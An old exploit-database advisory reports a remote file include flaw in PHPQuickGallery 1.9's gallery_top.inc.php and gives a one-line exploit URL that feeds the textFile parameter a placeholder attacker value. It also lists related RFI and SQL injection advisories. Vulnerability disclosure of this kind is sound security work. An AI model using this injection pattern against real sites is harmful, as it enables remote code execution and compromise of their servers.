Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Advanced Poll 2.0.7 Remote File Include Vulnerability

phpWebThings 1.5.2 (editor.php) Remote File Include Vulnerability

ASPNuke <= 0.80 (register. asp) Remote SQL Injection Vulnerability

A-Cart 2.0 SQL Injection

From:	Al7ejaz Hacker <saudi_(at)_hotmail.fr>
Date:	20.11.2006
Subject:	PHPQuickGallery <= 1.9 (textFile) Remote File Include Vulnerability

============================================================================
+                                                                          =
+                     PhpQuickGallery  Remot File Include
+                                                                          =
+
+===========================================================================
+
+
+
+Script: phpquickgallery
+
+RisQe : Dangeureuse
+
+Type: Remot File Include
+
+File Infected : gallery_top.inc.php
+
+Credit By: Al7ejaz Hacker
+
+E-mail: saudi@hotmail.fr
+============================================================================
+
+
++++++++++++
+Exploit : +
++++++++++++
+
+http://localhost/phpquickgallery/gallery_top.inc.php?textFile=Attacker
+
+
+
+Discoverd By Al7ejaz Hacker
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2006-11-19]